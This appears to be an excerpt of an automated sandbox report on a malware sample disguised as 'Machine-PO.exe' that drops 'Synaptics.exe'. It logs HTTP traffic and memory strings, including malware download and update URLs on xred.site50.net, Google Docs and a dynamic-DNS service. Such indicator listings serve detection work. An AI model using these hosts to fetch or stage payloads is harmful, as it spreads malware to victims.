                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC496NTgK6h3xMyBqWSTOASkXSKl3GnDYd9nasW8WRII1hElLU3ClkdR9bSe5uRUGiUAG82Nhp4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-mYgoKkz3iu8UGoANOzWn6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5jmVxbhKzSUIIMFEX3ZytixDiL3pADFVe1hXbxbncX_zXYotPCkL30PeGkRSTsKXg4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-14sotBtS7tYQzdxzS66IRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7izHuar7uQ206L-xu-k3mj8LBhLHAY1kar-yZIWx6R1SlJEKFkJn_hhdGnfvonz0ZKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:33 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-JzbTiofveld_1weHm55m-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7NKv4K7uh9icV8beG1G-C0nFwY04baUCzwiBoS13FCyi8UCB8PbDnBdtxAPOuT7V39Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:34 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-czx8Jis7tppnJ0wUUfRY7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5zCl7tfIHxqfEFWxVOR4M0tSe-fW3xJufJFgxn7zqpNZc0CYz0GHNdt52jPby5ZSabContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-UrFnLCUNUMUPFdmOfrpI3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6-rT-TxuIr7G52EyUoMbYVuNEAtr-kYpZic6RN6H6FhZxgh7jFVMPzJa9LNK0Q1vJgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-lqiyxKo0SI86GbWsz8eq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5R5opFDXBZDj_xFI2C1hgJm0xYjxTSUWTmPX91YVIMI1SvGlqsOUIwkNRlKSaTfwplContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTContent-Security-Policy: script-src 'report-sample' 'nonce--PuK1O-OFBCAmzE0SAdyoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7PVJPSoGwzHOoCGcY_qjYdov7cUW-0QHlkTqveU_wXLwtGVlxU4d2mFDjEIuqTQQZf55_Qok8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HMJpQcPy-1QNgBiJs3SXMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6DCeZRSCZBnMYPE1edPq1X3m8kNQxG7eWlBGQZXQGfT4Q49PKyoWG_CNL4JZ4DP6KZ4ojl5H0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-n6jQ911SFKGqysCdV7hlaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5eDVm4gnhoXToAsRrwGR411mWAbquMNanYAnd2chTOwahN8CDwiDciH9BDNwduHXexKWVDz8gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-YZAeA_VocUk2GA_Rk_TmsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978p
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1845982405.000000000F093000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/X
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/J
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/h
                              Source: Synaptics.exe, 00000003.00000002.1842892634.000000000D73E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1849242482.00000000106FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1849421104.000000001097E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1840307122.000000000B57E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841189054.000000000BE3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825291818.00000000079FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1822950617.0000000005D6E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833943337.000000000A03E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1847366378.00000000100BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834102292.000000000A17E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841534058.000000000C33E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1839261008.000000000AB7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841267999.000000000BF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821333577.000000000539E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1829158147.000000000823E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1846392989.000000000F6BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834746512.000000000A3FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1843620950.000000000DD7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1831297871.00000000094FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1820291042.00000000046AE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$=
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$x
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%A.0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&g
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(-32%
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(i_1
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(m~1-
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(q
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)D:3/
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-7X
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-C&2
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-O
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.bdn.4i_0
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com/pki/crl/)7Y
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.tr
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download//
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/I
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/r
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0/
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download02
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download03P
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download06P
